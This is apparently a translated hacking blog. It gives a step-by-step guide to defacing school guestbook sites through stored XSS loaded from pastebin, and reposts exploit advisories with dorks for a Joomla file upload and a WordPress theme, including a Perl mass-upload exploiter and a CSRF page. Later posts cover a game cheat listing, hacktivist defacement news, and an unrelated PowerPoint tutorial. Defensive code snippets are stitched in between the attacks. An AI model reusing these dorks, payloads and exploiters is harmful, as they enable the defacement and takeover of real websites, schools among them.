Saturday, July 6, 2019

Deface with a JSO PoC - DarkX7


Deface using the JSO method



DORK: inurl:/bukutamu.html site:sch.id (can be developed further)



Once you have found a target, you first need a JSO deface script.
To make one, prepare your own deface script (.html extension), then go to http://jdstiles.com/java/cct.html

Copy your entire HTML deface script, then paste it into the "Web Design" field.

After pasting, just click "CharcodeAt()".

The codes/numbers then appear in the field on the right. Copy that output (the charcodes).

Now insert them into this script: document.documentElement.innerHTML=String.fromCharCode(paste the codes here)

Example: document.documentElement.innerHTML=String.fromCharCode(60, 104, 116, 109, 108, 32, 100, 105, 114, 61, 34, 114, 116, 108, 34, 62, 10, 10)

After that, go to https://pastebin.com/, create a New Paste, and paste the code above into the field.

Save the new paste, click "raw", then paste the raw Pastebin link into this script. Example: <script type="text/javascript"src="https://pastebin.com/raw/k5GjJ4P4"></script>


That's it for creating the JSO script; all that is left is the defacing.



First, dork to find a vulnerable site. Then register/sign up to fill in the guestbook.

Fill it in with anything; what matters is that you paste this script into the "Pesan/Message/Info" field:
 <script type="text/javascript"src="https://pastebin.com/raw/k5GjJ4P4"></script> 

If the site is vulnerable, the page display changes immediately.
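Seen from the site owner's side, the behaviour above is stored XSS: the guestbook writes the message field into the page unescaped, so a script tag stored in it runs for every visitor. The following is an added example, not part of the original post; the function names, the `school.example` host and the sample entries are constructed. It shows the unsafe rendering beside an escaped one, a Content-Security-Policy value that refuses off-site scripts, and an audit of entries already stored.

```javascript
// Added example: defensive handling of guestbook input (all names are hypothetical).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five HTML-significant characters so stored text stays text.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: stored fields concatenated straight into markup.
function renderEntryUnsafe(entry) {
  return '<li><b>' + entry.name + '</b>: ' + entry.message + '</li>';
}

// Hardened pattern: every stored field is encoded at output time.
function renderEntrySafe(entry) {
  return '<li><b>' + escapeHtml(entry.name) + '</b>: ' + escapeHtml(entry.message) + '</li>';
}

// Second layer: response header value that only allows same-origin scripts.
const GUESTBOOK_CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Audit already-stored entries for script tags. [^>]* also covers a tag
// written without a space before src, as in type="text/javascript"src=...
function auditEntries(entries, ownHost) {
  const externalScript = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  const inlineScript = /<script\b(?![^>]*\bsrc\s*=)/i;
  const findings = [];
  for (const entry of entries) {
    const reasons = [];
    for (const match of entry.message.matchAll(externalScript)) {
      let host = null;
      try {
        host = new URL(match[1], 'https://' + ownHost).host;
      } catch (err) {
        host = null; // unparsable URL: treat as foreign
      }
      if (host !== ownHost) reasons.push('external script: ' + match[1]);
    }
    if (inlineScript.test(entry.message)) reasons.push('inline script tag');
    if (reasons.length > 0) findings.push({ id: entry.id, reasons });
  }
  return findings;
}

// Constructed sample data.
const SAMPLE_ENTRIES = [
  { id: 1, name: 'Budi', message: 'Nice website, greetings from class 9A' },
  { id: 2, name: 'x', message: '<script type="text/javascript"src="https://paste.example/raw/AAAA"></script>' },
  { id: 3, name: 'y', message: '<script>document.title = "x"</script>' },
];

console.log(renderEntrySafe(SAMPLE_ENTRIES[1]));
console.log(auditEntries(SAMPLE_ENTRIES, 'school.example'));
```

Escaping at output time is the primary fix; the CSP value is a second layer for any field that is missed.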



Example of a deface result with JSO:







Friday, June 28, 2019

Joomla Com_Attachments Components 3.x Arbitrary File Upload - DarkX7




####################################################################

# Exploit Title : Joomla Com_Attachments Components 3.x Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/05/2019
# Vendor Homepage : jmcameron.net
# Software Download Links : jmcameron.net/attachments/
jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip
joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip
joomlacode.org/gf/project/attachments/frs/
github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/
# Software Information Links : extensions.joomla.org/extension/attachments/
joomlacode.org/gf/project/attachments/
joomlacode.org/gf/project/attachments3/
# Joomla Affected Versions :
Joomla 3.4.8
Joomla 3.5.1
Joomla 3.6.5
Joomla 3.8.1
Joomla 3.8.11
Joomla 3.8.3
Joomla 3.9.6
# Software Affected Versions [ Component Com_Attachments ] : 
2.2.2 and 3.2.6 - 3.x / All previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : 
inurl:/index.php?option=com_attachments&task=upload
intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved.
intext:Treadmill Desk from TrekDesk
intext:Copyright © 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla
intext:Fundación Jesuitas Paraguay
intext:© 2019 Mars Society Polska
intext:Designed by atict.com
intext:Copyright © 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com
intext:Designed by Burosphere.
intext:Conselho Nacional de Recursos Hídricos CNRH Ministerio Do Desenvolvimento Regional
and more on Google and other Search Engines...... Have Fun....
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt

####################################################################

# Description about Software :
***************************
The 'Attachments' extension allows files to be uploaded and attached to content
articles in Joomla. Includes a plugin to display attachments and a component
for uploading and managing attachments.

####################################################################

# Impact :
***********
Joomla Attachments Components 3.x and other previous versions could allow a 
remote attacker to upload arbitrary files (including a shell upload), caused by the improper validation 
of file extensions by the multiple scripts to index.php. The issue occurs because 
the application fails to adequately sanitize user-supplied input. 
Exploiting this issue will allow attackers to execute arbitrary code within
the context of the affected application. This may facilitate unauthorized access 
or privilege escalation; other attacks may also be possible. 
By sending a specially-crafted HTTP request, a remote attacker could exploit 
this vulnerability to upload a malicious PHP script, which could allow the 
attacker to execute arbitrary PHP code on the vulnerable system.

####################################################################

# Arbitrary File Upload/Unauthorized File Insertion Exploit :
****************************************************
/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme

/index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme

Click to " Select file to upload instead "  - Fill the Form -  Published =>  '' Yes '' and Click " Public "

Attach file: - Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system.

# Directory File Path :
********************
/attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

source: https://packetstormsecurity.com/files/153088/Joomla-Attachments-3.x-File-Upload.html
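The extension handling the advisory describes (names such as `.phtml` or `.php;.gif` being accepted) is what a server-side allowlist has to close. The following is an added example, not code from the Attachments component or from the advisory; `validateUploadName`, the allowlist and the sample names are assumptions made for illustration, written for Node.js. Access control on the upload task and storing files outside the web root are separate controls it does not show.

```javascript
// Added example: server-side upload name validation (hypothetical helper, Node.js).
const crypto = require('crypto');

// Allowlist of final extensions the site actually needs.
const ALLOWED_EXTENSIONS = new Set(['txt', 'jpg', 'jpeg', 'png', 'gif', 'pdf']);
// Segments that a web server may hand to an interpreter.
const EXECUTABLE_SEGMENT = /^(php\d*|phtml|pht|phar|cgi|pl|py|asp|aspx|jsp|shtml)$/i;

function validateUploadName(originalName) {
  const reject = (reason) => ({ ok: false, reason });
  if (typeof originalName !== 'string' || originalName.length === 0 || originalName.length > 255) {
    return reject('empty or over-long name');
  }
  // ';' covers names such as "x.php;.gif"; also block control bytes and path separators.
  if (/[\x00-\x1f;\/\\]/.test(originalName)) {
    return reject('forbidden character');
  }
  const segments = originalName.split('.');
  if (segments.length < 2 || segments[0] === '') {
    return reject('missing base name or extension');
  }
  const extension = segments[segments.length - 1].toLowerCase();
  if (!ALLOWED_EXTENSIONS.has(extension)) {
    return reject('extension not allowed: ' + extension);
  }
  // Reject "shell.php.jpg": multi-extension handler mappings can still execute it.
  for (const inner of segments.slice(1, -1)) {
    if (EXECUTABLE_SEGMENT.test(inner)) return reject('executable inner extension: ' + inner);
  }
  // Never reuse the client-supplied name on disk.
  const storedName = crypto.randomBytes(16).toString('hex') + '.' + extension;
  return { ok: true, extension, storedName };
}

// Constructed sample names.
const SAMPLE_NAMES = ['notes.txt', 'photo.JPG', 'x.phtml', 'x.php;.gif', 'shell.php.jpg', '.htaccess'];
for (const name of SAMPLE_NAMES) console.log(name, validateUploadName(name));
```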

WordPress Satoshi Themes 2.0 CSRF Arbitrary File Upload - DarkX7



####################################################################

# Exploit Title : WordPress Satoshi Themes 2.0 CSRF Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/06/2019
# Vendor Homepage : vooshthemes.com - tecnoge.com - netsons.com
# WordPress Affected Versions : 4.7.13 - 3.4.2
# Theme Affected Version : 2.0
# Information Link : themesinfo.com/satoshi-theme-wordpress-portfolio-jpx
themesinfo.com/?search_type=folder&search=satoshi
# Theme used on : 106 websites
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Design By Voosh Themes
inurl:/wp-content/themes/satoshi/ - intext:Design By TecnoGe Informatica - 
# Vulnerability Type : 
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description About Software :
*****************************
Satoshi v2.0 theme WordPress portfolio. A Free Portfolio Theme Developed By Voosh Themes.

####################################################################

# Impact :
***********
WordPress 3.4.2/4.7.13 Satoshi Themes 2.0 is prone to a vulnerability that lets attackers 
upload arbitrary files because it fails to adequately sanitize user-supplied input. 
An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access 
or privilege escalation; other attacks are also possible. This WordPress Theme is
vulnerable to CSRF file upload via ajaxupload.3.5.js. CSRF occurs when the web application 
does not, or can not, sufficiently verify whether a well-formed, valid, consistent request 
was intentionally provided by the user who submitted the request.

####################################################################

# Vulnerability :
***************
/wp-content/themes/satoshi/upload-file.php

Vulnerability Message :
*********************
error

Directory File Path :
******************
/wp-content/themes/satoshi/images/[YOURFILENAME].html

# Arbitrary File Upload / Unauthorized File Insert Perl Exploiter :
********************************************************
#!/usr/bin/perl
use LWP::UserAgent;
# Coded By KingSkrupellos
# Cyberizm Digital Security Army
# Perl Exploiter By CyBeRiZM :)
my $qqvul ="/upload-file.php";#theme path vul
my $datestring = localtime();
($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();

sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
flag();
print "[+] Enter List Of Target : ";
chomp (my $list=<>);
print "[+] Enter Evil File : ";
chomp (my $file=<>);
print "[+] Started : $datestring\n";
open(my $arq,'<'.$list) || die($!);
my @site = <$arq>;
@site = grep { !/^$/ } @site;
close($arq);
print "[".($#site+1)."] URL to test upload\n\n"; 
my $i;
foreach my $web(@site){$i++;
    chomp($web);
    if($web !~ /^(http|https):\/\//){
        $web = 'http://'.$web;
    }
print "[$i] $web \n";
expqq($web);#exploiting website :)
} 
sub expqq{
my $useragent = randomagent();#Get a Random User Agent 
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept 
$ua->timeout(10);
$ua->agent($useragent);
print "[Testing] Exploit Existence \n";
my $url = $_[0]."/wp-content/themes/satoshi/".$qqvul;
my $ss = $_[0]."/wp-content/themes/satoshi/images/".$file;
my $response = $ua->get($url);
if ($response->is_success || $response->content=~/error/){
   print "[OK] Exploit Exists\n";
   print "[*] Sent payload\n";
   my $regex = 'success';
   my $body = $ua->post( $url,
        Content_Type => 'form-data',
        Content => [ 'uploadfile' => ["$file"] ]
   );
   if ($body->is_success ||$body->content=~ /$regex/){
      print "[+] Payload successfully executed\n";
      print "[*] Checking if shell was uploaded\n\n";
      my $res = $ua->get($ss);
      if ($res->is_success){
      print "[Upload] $_[0]/wp-content/satoshi/images/$file\n";
      }
      else {
      print "[Faild] check file\n";
      }
   } 
   else {print "[-] Payload failed : Not vulnerable\n";
   }
}
else {
print "[No] Exploit Not Found\n";
}
}
sub flag {print "\n[+] WP Satoshi Theme File Upload Exploiter By Cyberizm Digital Security Team \n[*] Coder => Cyberizm \n\n";
}

####################################################################

Cross Site Request Forgery CSRF Exploiter :
*****************************************
<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <title></title>
      <script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
      <script type='text/javascript' src="http://localhost/wp-content/themes/satoshi/js/ajaxupload.3.5.js"></script>

<script type='text/javascript'>//<![CDATA[ 
window.onload=function(){

 $(function(){
  var btnUpload=$('#upload');
  var status=$('#logo-upload-status');
  new AjaxUpload(btnUpload, {
   action: 'http://localhost/wp-content/themes/satoshi/upload-file.php',
   name: 'uploadfile',
   onSubmit: function(file, ext){
                /*
     if (! (ext && /^(jpg|png|jpeg|gif|html|txt)$/.test(ext))){ 
                    // extension is not allowed 
     status.text('Only HTML,TXT, JPG, PNG or GIF files are allowed');
     return false;
    }*/
    status.text('Uploading...');
   },
   onComplete: function(file, response){
    //On completion clear the status
    status.text('');
    //Add uploaded file to list
    if(response==="success"){
     $('<li></li>').appendTo('#files').html('<img src="http://localhost/wp-content/themes/satoshi/images/'+file+'" alt="" /><br />'+file).addClass('success');
     $('#satoshi_logo_image').val(file);
    } else{
     $('<li></li>').appendTo('#files').text(file).addClass('error');
    }
   }
  });
  
 });
}//]]>  
</script>

</head>
<body>
  
<span id="logo-upload-status"></span>
<input class="logo-name" id="satoshi_logo_image" type="text" name="satoshi_logo_image" value="">
<input type="button" class="background_pattern_button" id="upload" value="Choose Logo">
  
</body>
</html>

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

source:https://dl.packetstormsecurity.net/1906-exploits/wpsatoshi20-xsrfupload.txt
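The advisory's point is that the upload script accepts a request without verifying that an authorised user intentionally sent it. The following is an added example, not code from the theme or from the advisory; `authorizeUpload`, the request shape, the `csrfToken` field and the sample values are assumptions made for illustration, written for Node.js. It shows the checks an upload endpoint needs before it touches the file: an authorised session, a matching Origin header, and a session-bound CSRF token.

```javascript
// Added example: gate in front of an upload endpoint (hypothetical names, Node.js).
const crypto = require('crypto');

// Token bound to the session: HMAC(server secret, session id).
function issueCsrfToken(secret, sessionId) {
  return crypto.createHmac('sha256', secret).update(sessionId).digest('hex');
}

// Constant-time comparison; lengths are compared first because
// timingSafeEqual throws on buffers of different length.
function tokensMatch(expected, supplied) {
  const a = Buffer.from(expected, 'utf8');
  const b = Buffer.from(String(supplied === undefined ? '' : supplied), 'utf8');
  return a.length === b.length && crypto.timingSafeEqual(a, b);
}

function authorizeUpload(req, config) {
  const deny = (status, reason) => ({ allowed: false, status, reason });
  if (req.method !== 'POST') return deny(405, 'method not allowed');
  // A request with no logged-in, upload-capable session stops here.
  if (!req.session || !req.session.canUpload) return deny(403, 'no authorised session');
  // A form on another site carries that site's Origin.
  if ((req.headers || {}).origin !== config.siteOrigin) return deny(403, 'origin mismatch');
  const expected = issueCsrfToken(config.secret, req.session.id);
  if (!tokensMatch(expected, (req.body || {}).csrfToken)) return deny(403, 'bad CSRF token');
  return { allowed: true, status: 200, reason: 'ok' };
}

// Constructed configuration and requests.
const CONFIG = { siteOrigin: 'https://blog.example', secret: 'constructed-demo-secret' };
const SESSION = { id: 'sess-1234', canUpload: true };
const SAMPLE_REQUESTS = {
  direct: { method: 'POST', headers: {}, body: {} },
  forged: { method: 'POST', session: SESSION, headers: { origin: 'https://other.example' }, body: {} },
  noToken: { method: 'POST', session: SESSION, headers: { origin: CONFIG.siteOrigin }, body: {} },
  genuine: {
    method: 'POST', session: SESSION, headers: { origin: CONFIG.siteOrigin },
    body: { csrfToken: issueCsrfToken(CONFIG.secret, SESSION.id) },
  },
};

for (const [label, req] of Object.entries(SAMPLE_REQUESTS)) {
  console.log(label, authorizeUpload(req, CONFIG));
}
```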

Monday, August 18, 2014

Microsoft PowerPoint Tutorial - DarkX7



Microsoft PowerPoint is software that helps you put together an effective, professional, and easy presentation. Microsoft PowerPoint helps make an idea more interesting and its purpose clearer when presented, because it helps with creating slides, presentation outlines, electronic presentations, and dynamic slide displays, including attractive clip art, all of which are easy to show on a computer monitor.

  • Saving a file: click the Office Button; click Save As and choose how to save the file, e.g. PowerPoint 97-2003 Presentation; click Previous Locations (the location where the file is saved); enter the file name in File Name; click Save. Opening a file: click the Office Button; click Open; select and click the name of the file to open.

  • CREATING & DELETING PRESENTATION FILES. Creating a new slide: click the Home menu; click New Slide/Layout; choose the slide layout you want. Deleting a slide: click the Home menu; select the slide layout to delete; click Delete.

  • Choosing a slide design: click the Design menu; choose the slide style you need. Changing the background: right-click the layout; click Format Background; choose one of the Fill types - Solid Fill - Gradient Fill - Picture or Texture Fill
  • USING THE CONTENT OPTIONS. Inserting a chart: click the Insert menu; click Chart and choose the chart type (Column, Line, Pie, etc.); fill in the data table; choose Quick Layout (the table layout); choose Quick Style (the table style you want). Inserting clip art: click the Insert menu; click Clip Art; choose a picture; drag the picture into position.
  • USING THE CONTENT OPTIONS. Inserting a photo: click the Insert menu; click Photo Album; click File/Disk; choose a picture; click Insert; right-click and Copy; click Paste (place it on the destination slide). Inserting shapes: click the Insert menu; click Shapes; choose a shape; click at the position you want.
  • Slide design animation: click the Animations menu; select and click an animation style. Custom animation: click the Animations menu; select the text/picture; click Custom Animations; click Add Effect; the Entrance, Emphasis, Exit, Motion Paths menu appears; choose the animation you want.
     
  • RUNNING THE SLIDES: click the Slide Show menu and choose one of: - From Beginning (from the first slide) - From Current Slide (from the active slide)
     
  • Using animation. Sound/music animation: - click Insert, choose Sound - choose Sound from File - choose the song you want - click Automatically - a speaker icon is inserted. Movie/video animation: - click Insert, choose Movie - choose Movie from File - choose the video you want - click Automatically - a video image is inserted.
  • HAPPY LEARNING


Wednesday, July 16, 2014

Release 16 July 2014 Cheat POINT BLANK - DarkX7



 

Free File Download
No Password

Cheat Features:
Anti Banned ID Point Blank / Char 100%
Wallhack Mode
Name Wallhack
Unlimited Ammo All Weapon Reloaded
Auto Skill mode
Anti Spawn or No respawn
Auto Quick Change Mode
Auto Hp +20
No Recoil
Straight AWP
SG 1 Hit / One Hit Weapon
Jump Mode / Fly Mode
Hotkeys:
Anti Banned ID = Active immediately / Auto ON
Wallhack Mode = INSERT ON / OFF
Unlimited Ammo = F9 ON / OFF
Burst knife 1 Hit = END ON / OFF
Skill, Quick change + Auto Fullhack Terrorist / Red team = F10 ON / F12 OFF
Skill, Quick change + Auto Fullhack Police / Blue team = F11 ON / F12 OFF
No Recoil + Straight AWP = Home ON / OFF
Jump/Fly mode = F5 ON / OFF

=======
Tutorial:
=======
Open the cheat
Open PB Launcher
Start the cheat
Happy Cheating!

*Notes
For Windows 7 and 8, when opening the cheat and Point Blank, right-click and choose Run as administrator
To activate the cheat inside the game / In-Game Hack

Created By
New Pekalongan Kommunity

Tuesday, July 15, 2014

Israeli Hackers Strike Back - DarkX7

They are all activists from hacking groups and communities that have united and joined an operation code-named #OpIsrael #OpSaveGaza. A variety of targets have been taken down through DDoS, and many sites have had their pages changed through defacement.



This provoked Israeli hackers to strike back against Indonesia, so they too carried out hacking actions against Indonesian sites. Several Indonesian sites have already had their front pages changed (defaced) with a star logo and the following text:

Hacked by Israelite – IEC

Do not touch site Israel!
Do not Interfere with Our Affairs,!

Haii People Indonesian!! STOP For # Op_SaveGaza! Warning !
If you will judge us in the virtual world.

We Will Take Revenge on You, Cyber Indonesia!

IDF – Israel Cyber Army – Israel Elite Cyber – Israel People – .co.il – .il – .gov.il – Israel Defense – Go! Isra – Israil! – Israelite

Show Your Skill Cyber of Indonesia!

The perpetrator, code-named Israelite, calls on Indonesian hackers not to touch or damage Israeli sites. This is the first attack from Israeli hackers, intended to warn Indonesian hackers not to get too involved in the affairs of their country. Some of the websites they have already hacked:

http://carapakaikerudung.com/
http://kerajinanrotanmalang.com/index.html

According to a report we received, one hacktivist said “How come Israel's language uses Google Translate.. that's weird.. lol” In his view, this hacking may not have come from the Israeli side, but from Indonesia or from a certain party aiming to scapegoat Israel so that this cyberwar keeps burning and heats up further.

Jim Geovedi Will Destroy Israel's Iron Dome - DarkX7



It caused a stir online, especially on social networks, that one of Indonesia's famous legendary hackers, Jim Geovedi, would help in the attack on Israel. Word of the post spread widely through sharing on social networks, saying that Jim Geovedi would destroy the Iron Dome and hack Israeli-owned sites.


Hearing this, the legend Jim Geovedi, as written from his account, said that the claim that he would destroy Israel's Iron Dome or get involved in the attack on Israel is not true. “I'd really like to be understanding and say ‘they're just kids’, but I end up dismayed and thinking: if at the kids' level they are already good at manipulating, what will it be like when they grow up?” he said.
As we all know, the cyber attack on Israel began on 11 July 2014. To this day attacks continue to be launched against Israel's internet space, from defacement to taking down Israeli-domain (.il) sites with DDoS attacks. The action has been supported by many hacker groups and communities from around the world who are helping in the attack.
